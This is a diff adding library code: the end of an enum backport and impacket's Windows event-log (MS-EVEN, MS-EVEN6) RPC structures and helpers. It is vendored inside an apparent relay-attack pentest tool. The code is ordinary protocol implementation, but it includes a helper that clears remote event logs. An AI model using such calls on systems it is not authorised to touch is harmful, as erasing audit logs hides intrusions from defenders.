+                    setattr(enum_class, method, getattr(int, method))
+
+        # replace any other __new__ with our own (as long as Enum is not None,
+        # anyway) -- again, this is to support pickle
+        if Enum is not None:
+            # if the user defined their own __new__, save it before it gets
+            # clobbered in case they subclass later
+            if save_new:
+                setattr(enum_class, '__member_new__', enum_class.__dict__['__new__'])
+            setattr(enum_class, '__new__', Enum.__dict__['__new__'])
+        return enum_class
+
+    def __call__(cls, value, names=None, module=None, type=None):
+        """Either returns an existing member, or creates a new enum class.
+
+        This method is used both when an enum class is given a value to match
+        to an enumeration member (i.e. Color(3)) and for the functional API
+        (i.e. Color = Enum('Color', names='red green blue')).
+
+        When used for the functional API: `module`, if set, will be stored in
+        the new class' __module__ attribute; `type`, if set, will be mixed in
+        as the first base class.
+
+        Note: if `module` is not set this routine will attempt to discover the
+        calling module by walking the frame stack; if this is unsuccessful
+        the resulting class will not be pickleable.
+
+        """
+        if names is None:  # simple value lookup
+            return cls.__new__(cls, value)
+        # otherwise, functional API: we're creating a new Enum type
+        return cls._create_(value, names, module=module, type=type)
+
+    def __contains__(cls, member):
+        return isinstance(member, cls) and member.name in cls._member_map_
+
+    def __delattr__(cls, attr):
+        # nicer error message when someone tries to delete an attribute
+        # (see issue19025).
+        if attr in cls._member_map_:
+            raise AttributeError(
+                    "%s: cannot delete Enum member." % cls.__name__)
+        super(EnumMeta, cls).__delattr__(attr)
+
+    def __dir__(self):
+        return (['__class__', '__doc__', '__members__', '__module__'] +
+                self._member_names_)
+
+    @property
+    def __members__(cls):
+        """Returns a mapping of member name->value.
+
+        This mapping lists all enum members, including aliases. Note that this
+        is a copy of the internal mapping.
+
+        """
+        return cls._member_map_.copy()
+
+    def __getattr__(cls, name):
+        """Return the enum member matching `name`
+
+        We use __getattr__ instead of descriptors or inserting into the enum
+        class' __dict__ in order to support `name` and `value` being both
+        properties for enum members (which live in the class' __dict__) and
+        enum members themselves.
+
+        """
+        if _is_dunder(name):
+            raise AttributeError(name)
+        try:
+            return cls._member_map_[name]
+        except KeyError:
+            raise AttributeError(name)
+
+    def __getitem__(cls, name):
+        return cls._member_map_[name]
+
+    def __iter__(cls):
+        return (cls._member_map_[name] for name in cls._member_names_)
+
+    def __reversed__(cls):
+        return (cls._member_map_[name] for name in reversed(cls._member_names_))
+
+    def __len__(cls):
+        return len(cls._member_names_)
+
+    def __repr__(cls):
+        return "<enum %r>" % cls.__name__
+
+    def __setattr__(cls, name, value):
+        """Block attempts to reassign Enum members.
+
+        A simple assignment to the class namespace only changes one of the
+        several possible ways to get an Enum member from the Enum class,
+        resulting in an inconsistent Enumeration.
+
+        """
+        member_map = cls.__dict__.get('_member_map_', {})
+        if name in member_map:
+            raise AttributeError('Cannot reassign members.')
+        super(EnumMeta, cls).__setattr__(name, value)
+
+    def _create_(cls, class_name, names=None, module=None, type=None):
+        """Convenience method to create a new Enum class.
+
+        `names` can be:
+
+        * A string containing member names, separated either with spaces or
+          commas.  Values are auto-numbered from 1.
+        * An iterable of member names.  Values are auto-numbered from 1.
+        * An iterable of (member name, value) pairs.
+        * A mapping of member name -> value.
+
+        """
+        metacls = cls.__class__
+        if type is None:
+            bases = (cls, )
+        else:
+            bases = (type, cls)
+        classdict = metacls.__prepare__(class_name, bases)
+        __order__ = []
+
+        # special processing needed for names?
+        if isinstance(names, str):
+            names = names.replace(',', ' ').split()
+        if isinstance(names, (tuple, list)) and isinstance(names[0], str):
+            names = [(e, i+1) for (i, e) in enumerate(names)]
+
+        # Here, names is either an iterable of (name, value) or a mapping.
+        for item in names:
+            if isinstance(item, str):
+                member_name, member_value = item, names[item]
+            else:
+                member_name, member_value = item
+            classdict[member_name] = member_value
+            __order__.append(member_name)
+        # only set __order__ in classdict if name/value was not from a mapping
+        if not isinstance(item, str):
+            classdict['__order__'] = ' '.join(__order__)
+        enum_class = metacls.__new__(metacls, class_name, bases, classdict)
+
+        # TODO: replace the frame hack if a blessed way to know the calling
+        # module is ever developed
+        if module is None:
+            try:
+                module = _sys._getframe(2).f_globals['__name__']
+            except (AttributeError, ValueError):
+                pass
+        if module is None:
+            _make_class_unpicklable(enum_class)
+        else:
+            enum_class.__module__ = module
+
+        return enum_class
+
+    @staticmethod
+    def _get_mixins_(bases):
+        """Returns the type for creating enum members, and the first inherited
+        enum class.
+
+        bases: the tuple of bases that was given to __new__
+
+        """
+        if not bases or Enum is None:
+            return object, Enum
+        
+
+        # double check that we are not subclassing a class with existing
+        # enumeration members; while we're at it, see if any other data
+        # type has been mixed in so we can use the correct __new__
+        member_type = first_enum = None
+        for base in bases:
+            if  (base is not Enum and
+                    issubclass(base, Enum) and
+                    base._member_names_):
+                raise TypeError("Cannot extend enumerations")
+        # base is now the last base in bases
+        if not issubclass(base, Enum):
+            raise TypeError("new enumerations must be created as "
+                    "`ClassName([mixin_type,] enum_type)`")
+
+        # get correct mix-in type (either mix-in type of Enum subclass, or
+        # first base if last base is Enum)
+        if not issubclass(bases[0], Enum):
+            member_type = bases[0]     # first data type
+            first_enum = bases[-1]  # enum type
+        else:
+            for base in bases[0].__mro__:
+                # most common: (IntEnum, int, Enum, object)
+                # possible:    (<Enum 'AutoIntEnum'>, <Enum 'IntEnum'>,
+                #               <class 'int'>, <Enum 'Enum'>,
+                #               <class 'object'>)
+                if issubclass(base, Enum):
+                    if first_enum is None:
+                        first_enum = base
+                else:
+                    if member_type is None:
+                        member_type = base
+
+        return member_type, first_enum
+
+    if pyver < 3.0:
+        @staticmethod
+        def _find_new_(classdict, member_type, first_enum):
+            """Returns the __new__ to be used for creating the enum members.
+
+            classdict: the class dictionary given to __new__
+            member_type: the data type whose __new__ will be used by default
+            first_enum: enumeration to check for an overriding __new__
+
+            """
+            # now find the correct __new__, checking to see of one was defined
+            # by the user; also check earlier enum classes in case a __new__ was
+            # saved as __member_new__
+            __new__ = classdict.get('__new__', None)
+            if __new__:
+                return None, True, True      # __new__, save_new, use_args
+
+            N__new__ = getattr(None, '__new__')
+            O__new__ = getattr(object, '__new__')
+            if Enum is None:
+                E__new__ = N__new__
+            else:
+                E__new__ = Enum.__dict__['__new__']
+            # check all possibles for __member_new__ before falling back to
+            # __new__
+            for method in ('__member_new__', '__new__'):
+                for possible in (member_type, first_enum):
+                    try:
+                        target = possible.__dict__[method]
+                    except (AttributeError, KeyError):
+                        target = getattr(possible, method, None)
+                    if target not in [
+                            None,
+                            N__new__,
+                            O__new__,
+                            E__new__,
+                            ]:
+                        if method == '__member_new__':
+                            classdict['__new__'] = target
+                            return None, False, True
+                        if isinstance(target, staticmethod):
+                            target = target.__get__(member_type)
+                        __new__ = target
+                        break
+                if __new__ is not None:
+                    break
+            else:
+                __new__ = object.__new__
+
+            # if a non-object.__new__ is used then whatever value/tuple was
+            # assigned to the enum member name will be passed to __new__ and to the
+            # new enum member's __init__
+            if __new__ is object.__new__:
+                use_args = False
+            else:
+                use_args = True
+
+            return __new__, False, use_args
+    else:
+        @staticmethod
+        def _find_new_(classdict, member_type, first_enum):
+            """Returns the __new__ to be used for creating the enum members.
+
+            classdict: the class dictionary given to __new__
+            member_type: the data type whose __new__ will be used by default
+            first_enum: enumeration to check for an overriding __new__
+
+            """
+            # now find the correct __new__, checking to see of one was defined
+            # by the user; also check earlier enum classes in case a __new__ was
+            # saved as __member_new__
+            __new__ = classdict.get('__new__', None)
+
+            # should __new__ be saved as __member_new__ later?
+            save_new = __new__ is not None
+
+            if __new__ is None:
+                # check all possibles for __member_new__ before falling back to
+                # __new__
+                for method in ('__member_new__', '__new__'):
+                    for possible in (member_type, first_enum):
+                        target = getattr(possible, method, None)
+                        if target not in (
+                                None,
+                                None.__new__,
+                                object.__new__,
+                                Enum.__new__,
+                                ):
+                            __new__ = target
+                            break
+                    if __new__ is not None:
+                        break
+                else:
+                    __new__ = object.__new__
+
+            # if a non-object.__new__ is used then whatever value/tuple was
+            # assigned to the enum member name will be passed to __new__ and to the
+            # new enum member's __init__
+            if __new__ is object.__new__:
+                use_args = False
+            else:
+                use_args = True
+
+            return __new__, save_new, use_args
+
+
+########################################################
+# In order to support Python 2 and 3 with a single
+# codebase we have to create the Enum methods separately
+# and then use the `type(name, bases, dict)` method to
+# create the class.
+########################################################
+temp_enum_dict = {}
+temp_enum_dict['__doc__'] = "Generic enumeration.\n\n    Derive from this class to define new enumerations.\n\n"
+
+def __new__(cls, value):
+    # all enum instances are actually created during class construction
+    # without calling this method; this method is called by the metaclass'
+    # __call__ (i.e. Color(3) ), and by pickle
+    if type(value) is cls:
+        # For lookups like Color(Color.red)
+        value = value.value
+        #return value
+    # by-value search for a matching enum member
+    # see if it's in the reverse mapping (for hashable values)
+    try:
+        if value in cls._value2member_map_:
+            return cls._value2member_map_[value]
+    except TypeError:
+        # not there, now do long search -- O(n) behavior
+        for member in cls._member_map_.values():
+            if member.value == value:
+                return member
+    raise ValueError("%s is not a valid %s" % (value, cls.__name__))
+temp_enum_dict['__new__'] = __new__
+del __new__
+
+def __repr__(self):
+    return "<%s.%s: %r>" % (
+            self.__class__.__name__, self._name_, self._value_)
+temp_enum_dict['__repr__'] = __repr__
+del __repr__
+
+def __str__(self):
+    return "%s.%s" % (self.__class__.__name__, self._name_)
+temp_enum_dict['__str__'] = __str__
+del __str__
+
+def __dir__(self):
+    added_behavior = [m for m in self.__class__.__dict__ if m[0] != '_']
+    return (['__class__', '__doc__', '__module__', 'name', 'value'] + added_behavior)
+temp_enum_dict['__dir__'] = __dir__
+del __dir__
+
+def __format__(self, format_spec):
+    # mixed-in Enums should use the mixed-in type's __format__, otherwise
+    # we can get strange results with the Enum name showing up instead of
+    # the value
+
+    # pure Enum branch
+    if self._member_type_ is object:
+        cls = str
+        val = str(self)
+    # mix-in branch
+    else:
+        cls = self._member_type_
+        val = self.value
+    return cls.__format__(val, format_spec)
+temp_enum_dict['__format__'] = __format__
+del __format__
+
+
+####################################
+# Python's less than 2.6 use __cmp__
+
+if pyver < 2.6:
+
+    def __cmp__(self, other):
+        if type(other) is self.__class__:
+            if self is other:
+                return 0
+            return -1
+        return NotImplemented
+        raise TypeError("unorderable types: %s() and %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__cmp__'] = __cmp__
+    del __cmp__
+
+else:
+
+    def __le__(self, other):
+        raise TypeError("unorderable types: %s() <= %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__le__'] = __le__
+    del __le__
+
+    def __lt__(self, other):
+        raise TypeError("unorderable types: %s() < %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__lt__'] = __lt__
+    del __lt__
+
+    def __ge__(self, other):
+        raise TypeError("unorderable types: %s() >= %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__ge__'] = __ge__
+    del __ge__
+
+    def __gt__(self, other):
+        raise TypeError("unorderable types: %s() > %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__gt__'] = __gt__
+    del __gt__
+    
+
+def __eq__(self, other):
+    if type(other) is self.__class__:
+        return self is other
+    return NotImplemented
+temp_enum_dict['__eq__'] = __eq__
+del __eq__
+
+def __ne__(self, other):
+    if type(other) is self.__class__:
+        return self is not other
+    return NotImplemented
+temp_enum_dict['__ne__'] = __ne__
+del __ne__
+
+def __getnewargs__(self):
+    return (self._value_, )
+temp_enum_dict['__getnewargs__'] = __getnewargs__
+del __getnewargs__
+
+def __hash__(self):
+    return hash(self._name_)
+temp_enum_dict['__hash__'] = __hash__
+del __hash__
+
+# _RouteClassAttributeToGetattr is used to provide access to the `name`
+# and `value` properties of enum members while keeping some measure of
+# protection from modification, while still allowing for an enumeration
+# to have members named `name` and `value`.  This works because enumeration
+# members are not set directly on the enum class -- __getattr__ is
+# used to look them up.
+
+@_RouteClassAttributeToGetattr
+def name(self):
+    return self._name_
+temp_enum_dict['name'] = name
+del name
+
+@_RouteClassAttributeToGetattr
+def value(self):
+    return self._value_
+temp_enum_dict['value'] = value
+del value
+
+Enum = EnumMeta('Enum', (object, ), temp_enum_dict)
+del temp_enum_dict
+
+# Enum has now been created
+###########################
+
+class IntEnum(int, Enum):
+    """Enum where members are also (and must be) ints"""
+
+
+def unique(enumeration):
+    """Class decorator that ensures only unique members exist in an enumeration."""
+    duplicates = []
+    for name, member in enumeration.__members__.items():
+        if name != member.name:
+            duplicates.append((name, member.name))
+    if duplicates:
+        duplicate_names = ', '.join(
+                ["%s -> %s" % (alias, name) for (alias, name) in duplicates]
+                )
+        raise ValueError('duplicate names found in %r: %s' %
+                (enumeration, duplicate_names)
+                )
+    return enumeration

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/even.py

@@ -0,0 +1,400 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#         Itamar Mizrahi (@MrAnde7son)
+#
+# Description:
+#   [MS-EVEN] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file.
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too.
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDR, NDRPOINTERNULL, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import ULONG, LPWSTR, RPC_UNICODE_STRING, LPSTR, NTSTATUS, NULL, PRPC_UNICODE_STRING, PULONG, USHORT, PRPC_SID, LPBYTE
+from impacket.dcerpc.v5.lsad import PRPC_UNICODE_STRING_ARRAY
+from impacket.structure import Structure
+from impacket import nt_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_EVEN  = uuidtup_to_bin(('82273FDC-E32A-18C3-3F78-827929DC23EA','0.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in nt_errors.ERROR_MESSAGES:
+            error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1]
+            return 'EVEN SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'EVEN SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.2 EventType
+EVENTLOG_SUCCESS           = 0x0000
+EVENTLOG_ERROR_TYPE        = 0x0001
+EVENTLOG_WARNING_TYPE      = 0x0002
+EVENTLOG_INFORMATION_TYPE  = 0x0004
+EVENTLOG_AUDIT_SUCCESS     = 0x0008
+EVENTLOG_AUDIT_FAILURE     = 0x0010
+
+# 2.2.7 EVENTLOG_HANDLE_A and EVENTLOG_HANDLE_W
+#EVENTLOG_HANDLE_A
+EVENTLOG_HANDLE_W = LPWSTR
+
+# 2.2.9 Constants Used in Method Definitions
+MAX_STRINGS      = 0x00000100
+MAX_SINGLE_EVENT = 0x0003FFFF
+MAX_BATCH_BUFF   = 0x0007FFFF
+
+# 3.1.4.7 ElfrReadELW (Opnum 10)
+EVENTLOG_SEQUENTIAL_READ = 0x00000001
+EVENTLOG_SEEK_READ       = 0x00000002
+
+EVENTLOG_FORWARDS_READ   = 0x00000004
+EVENTLOG_BACKWARDS_READ  = 0x00000008
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class IELF_HANDLE(NDRSTRUCT):
+    structure =  (
+        ('Data','20s=""'),
+    )
+    def getAlignment(self):
+        return 1
+
+# 2.2.3 EVENTLOGRECORD
+class EVENTLOGRECORD(Structure):
+    structure = (
+        ('Length','<L=0'),
+        ('Reserved','<L=0'),
+        ('RecordNumber','<L=0'),
+        ('TimeGenerated','<L=0'),
+        ('TimeWritten','<L=0'),
+        ('EventID','<L=0'),
+        ('EventType','<H=0'),
+        ('NumStrings','<H=0'),
+        ('EventCategory','<H=0'),
+        ('ReservedFlags','<H=0'),
+        ('ClosingRecordNumber','<L=0'),
+        ('StringOffset','<L=0'),
+        ('UserSidLength','<L=0'),
+        ('UserSidOffset','<L=0'),
+        ('DataLength','<L=0'),
+        ('DataOffset','<L=0'),
+        ('SourceName','z'),
+        ('Computername','z'),
+        ('UserSidPadding',':'),
+        ('_UserSid','_-UserSid', 'self["UserSidLength"]'),
+        ('UserSid',':'),
+        ('Strings',':'),
+        ('_Data','_-Data', 'self["DataLength"]'),
+        ('Data',':'),
+        ('Padding',':'),
+        ('Length2','<L=0'),
+    )
+
+# 2.2.4 EVENTLOG_FULL_INFORMATION
+class EVENTLOG_FULL_INFORMATION(NDRSTRUCT):
+    structure = (
+        ('dwFull', ULONG),
+    )
+
+# 2.2.8 RPC_CLIENT_ID
+class RPC_CLIENT_ID(NDRSTRUCT):
+    structure = (
+        ('UniqueProcess', ULONG),
+        ('UniqueThread', ULONG),
+    )
+
+# 2.2.12 RPC_STRING
+class RPC_STRING(NDRSTRUCT):
+    structure = (
+        ('Length','<H=0'),
+        ('MaximumLength','<H=0'),
+        ('Data',LPSTR),
+    )
+
+    def __setitem__(self, key, value):
+        if key == 'Data' and isinstance(value, NDR) is False:
+            self['Length'] = len(value)
+            self['MaximumLength'] = len(value)
+        return NDRSTRUCT.__setitem__(self, key, value)
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None: msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+
+        if isinstance(self.fields['Data'] , NDRPOINTERNULL):
+            print(" NULL", end=' ')
+        elif self.fields['Data']['ReferentID'] == 0:
+            print(" NULL", end=' ')
+        else:
+            return self.fields['Data'].dump('',indent)
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.4.9 ElfrClearELFW (Opnum 0)
+class ElfrClearELFW(NDRCALL):
+    opnum = 0
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('BackupFileName', PRPC_UNICODE_STRING),
+    )
+
+class ElfrClearELFWResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.11 ElfrBackupELFW (Opnum 1)
+class ElfrBackupELFW(NDRCALL):
+    opnum = 1
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('BackupFileName', RPC_UNICODE_STRING),
+    )
+
+class ElfrBackupELFWResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.21 ElfrCloseEL (Opnum 2)
+class ElfrCloseEL(NDRCALL):
+    opnum = 2
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+    )
+
+class ElfrCloseELResponse(NDRCALL):
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+        ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.18 ElfrNumberOfRecords (Opnum 4)
+class ElfrNumberOfRecords(NDRCALL):
+    opnum = 4
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+    )
+
+class ElfrNumberOfRecordsResponse(NDRCALL):
+    structure = (
+        ('NumberOfRecords', ULONG),
+        ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.19 ElfrOldestRecord (Opnum 5)
+class ElfrOldestRecord(NDRCALL):
+    opnum = 5
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+    )
+
+class ElfrOldestRecordResponse(NDRCALL):
+    structure = (
+        ('OldestRecordNumber', ULONG),
+        ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.3 ElfrOpenELW (Opnum 7)
+class ElfrOpenELW(NDRCALL):
+    opnum = 7
+    structure = (
+       ('UNCServerName', EVENTLOG_HANDLE_W),
+       ('ModuleName', RPC_UNICODE_STRING),
+       ('RegModuleName', RPC_UNICODE_STRING),
+       ('MajorVersion', ULONG),
+       ('MinorVersion', ULONG),
+    )
+
+class ElfrOpenELWResponse(NDRCALL):
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.5 ElfrRegisterEventSourceW (Opnum 8)
+class ElfrRegisterEventSourceW(NDRCALL):
+    opnum = 8
+    structure = (
+       ('UNCServerName', EVENTLOG_HANDLE_W),
+       ('ModuleName', RPC_UNICODE_STRING),
+       ('RegModuleName', RPC_UNICODE_STRING),
+       ('MajorVersion', ULONG),
+       ('MinorVersion', ULONG),
+    )
+
+class ElfrRegisterEventSourceWResponse(NDRCALL):
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.1 ElfrOpenBELW (Opnum 9)
+class ElfrOpenBELW(NDRCALL):
+    opnum = 9
+    structure = (
+       ('UNCServerName', EVENTLOG_HANDLE_W),
+       ('BackupFileName', RPC_UNICODE_STRING),
+       ('MajorVersion', ULONG),
+       ('MinorVersion', ULONG),
+    )
+
+class ElfrOpenBELWResponse(NDRCALL):
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.7 ElfrReadELW (Opnum 10)
+class ElfrReadELW(NDRCALL):
+    opnum = 10
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ReadFlags', ULONG),
+       ('RecordOffset', ULONG),
+       ('NumberOfBytesToRead', ULONG),
+    )
+
+class ElfrReadELWResponse(NDRCALL):
+    structure = (
+       ('Buffer', NDRUniConformantArray),
+       ('NumberOfBytesRead', ULONG),
+       ('MinNumberOfBytesNeeded', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.13 ElfrReportEventW (Opnum 11)
+class ElfrReportEventW(NDRCALL):
+    opnum = 11
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('Time', ULONG),
+       ('EventType', USHORT),
+       ('EventCategory', USHORT),
+       ('EventID', ULONG),
+       ('NumStrings', USHORT),
+       ('DataSize', ULONG),
+       ('ComputerName', RPC_UNICODE_STRING),
+       ('UserSID', PRPC_SID),
+       ('Strings', PRPC_UNICODE_STRING_ARRAY),
+       ('Data', LPBYTE),
+       ('Flags', USHORT),
+       ('RecordNumber', PULONG),
+       ('TimeWritten', PULONG),
+    )
+
+class ElfrReportEventWResponse(NDRCALL):
+    structure = (
+       ('RecordNumber', PULONG),
+       ('TimeWritten', PULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+    0   : (ElfrClearELFW, ElfrClearELFWResponse),
+    1   : (ElfrBackupELFW, ElfrBackupELFWResponse),
+    2   : (ElfrCloseEL, ElfrCloseELResponse),
+    4   : (ElfrNumberOfRecords, ElfrNumberOfRecordsResponse),
+    5   : (ElfrOldestRecord, ElfrOldestRecordResponse),
+    7   : (ElfrOpenELW, ElfrOpenELWResponse),
+    8   : (ElfrRegisterEventSourceW, ElfrRegisterEventSourceWResponse),
+    9   : (ElfrOpenBELW, ElfrOpenBELWResponse),
+    10  : (ElfrReadELW, ElfrReadELWResponse),
+    11  : (ElfrReportEventW, ElfrReportEventWResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hElfrOpenBELW(dce, backupFileName = NULL):
+    request = ElfrOpenBELW()
+    request['UNCServerName'] = NULL
+    request['BackupFileName'] = backupFileName
+    request['MajorVersion'] = 1
+    request['MinorVersion'] = 1
+    return dce.request(request)
+
+def hElfrOpenELW(dce, moduleName = NULL, regModuleName = NULL):
+    request = ElfrOpenELW()
+    request['UNCServerName'] = NULL
+    request['ModuleName'] = moduleName
+    request['RegModuleName'] = regModuleName
+    request['MajorVersion'] = 1
+    request['MinorVersion'] = 1
+    return dce.request(request)
+
+def hElfrCloseEL(dce, logHandle):
+    request = ElfrCloseEL()
+    request['LogHandle'] = logHandle
+    resp = dce.request(request)
+    return resp
+
+def hElfrRegisterEventSourceW(dce, moduleName = NULL, regModuleName = NULL):
+    request = ElfrRegisterEventSourceW()
+    request['UNCServerName'] = NULL
+    request['ModuleName'] = moduleName
+    request['RegModuleName'] = regModuleName
+    request['MajorVersion'] = 1
+    request['MinorVersion'] = 1
+    return dce.request(request)
+
+def hElfrReadELW(dce, logHandle = '', readFlags = EVENTLOG_SEEK_READ|EVENTLOG_FORWARDS_READ,
+                 recordOffset = 0, numberOfBytesToRead = MAX_BATCH_BUFF):
+    request = ElfrReadELW()
+    request['LogHandle'] = logHandle
+    request['ReadFlags'] = readFlags
+    request['RecordOffset'] = recordOffset
+    request['NumberOfBytesToRead'] = numberOfBytesToRead
+    return dce.request(request)
+
+def hElfrClearELFW(dce, logHandle = '', backupFileName = NULL):
+    request = ElfrClearELFW()
+    request['LogHandle'] = logHandle
+    request['BackupFileName'] = backupFileName
+    return dce.request(request)
+
+def hElfrBackupELFW(dce, logHandle = '', backupFileName = NULL):
+    request = ElfrBackupELFW()
+    request['LogHandle'] = logHandle
+    request['BackupFileName'] = backupFileName
+    return dce.request(request)
+
+def hElfrNumberOfRecords(dce, logHandle):
+    request = ElfrNumberOfRecords()
+    request['LogHandle'] = logHandle
+    resp = dce.request(request)
+    return resp
+
+def hElfrOldestRecordNumber(dce, logHandle):
+    request = ElfrOldestRecord()
+    request['LogHandle'] = logHandle
+    resp = dce.request(request)
+    return resp

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/even6.py

@@ -0,0 +1,344 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+# Copyright (c) 2017 @MrAnde7son
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Itamar (@MrAnde7son)
+#
+# Description:
+#   Initial [MS-EVEN6] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file.
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too.
+#
+from impacket import system_errors
+from impacket.dcerpc.v5.dtypes import WSTR, DWORD, LPWSTR, ULONG, LARGE_INTEGER, WORD, BYTE
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray, NDRUniVaryingArray, NDRSTRUCT
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_EVEN6 = uuidtup_to_bin(('F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__(self):
+        key = self.error_code
+        if key in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+            return 'EVEN6 SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'EVEN6 SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+# Evt Path Flags
+EvtQueryChannelName = 0x00000001
+EvtQueryFilePath = 0x00000002
+EvtReadOldestToNewest = 0x00000100
+EvtReadNewestToOldest = 0x00000200
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class CONTEXT_HANDLE_LOG_HANDLE(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', '20s=""'),
+    )
+
+class PCONTEXT_HANDLE_LOG_HANDLE(NDRPOINTER):
+    referent = (
+        ('Data', CONTEXT_HANDLE_LOG_HANDLE),
+    )
+
+class CONTEXT_HANDLE_LOG_QUERY(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', '20s=""'),
+    )
+
+class PCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER):
+    referent = (
+        ('Data', CONTEXT_HANDLE_LOG_QUERY),
+    )
+
+class LPPCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER):
+    referent = (
+        ('Data', PCONTEXT_HANDLE_LOG_QUERY),
+    )
+
+class CONTEXT_HANDLE_OPERATION_CONTROL(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', '20s=""'),
+    )
+
+class PCONTEXT_HANDLE_OPERATION_CONTROL(NDRPOINTER):
+    referent = (
+        ('Data', CONTEXT_HANDLE_OPERATION_CONTROL),
+    )
+
+# 2.2.11 EvtRpcQueryChannelInfo
+class EvtRpcQueryChannelInfo(NDRSTRUCT):
+    structure = (
+        ('Name', LPWSTR),
+        ('Status', DWORD),
+    )
+
+class EvtRpcQueryChannelInfoArray(NDRUniVaryingArray):
+    item = EvtRpcQueryChannelInfo
+
+class LPEvtRpcQueryChannelInfoArray(NDRPOINTER):
+    referent = (
+        ('Data', EvtRpcQueryChannelInfoArray)
+    )
+
+class RPC_INFO(NDRSTRUCT):
+    structure = (
+        ('Error', DWORD),
+        ('SubError', DWORD),
+        ('SubErrorParam', DWORD),
+    )
+
+class PRPC_INFO(NDRPOINTER):
+    referent = (
+        ('Data', RPC_INFO)
+    )
+
+class WSTR_ARRAY(NDRUniVaryingArray):
+    item = WSTR
+
+class DWORD_ARRAY(NDRUniVaryingArray):
+    item = DWORD
+
+class LPDWORD_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', DWORD_ARRAY)
+    )
+
+class BYTE_ARRAY(NDRUniVaryingArray):
+    item = 'c'
+
+class CBYTE_ARRAY(NDRUniVaryingArray):
+    item = BYTE
+
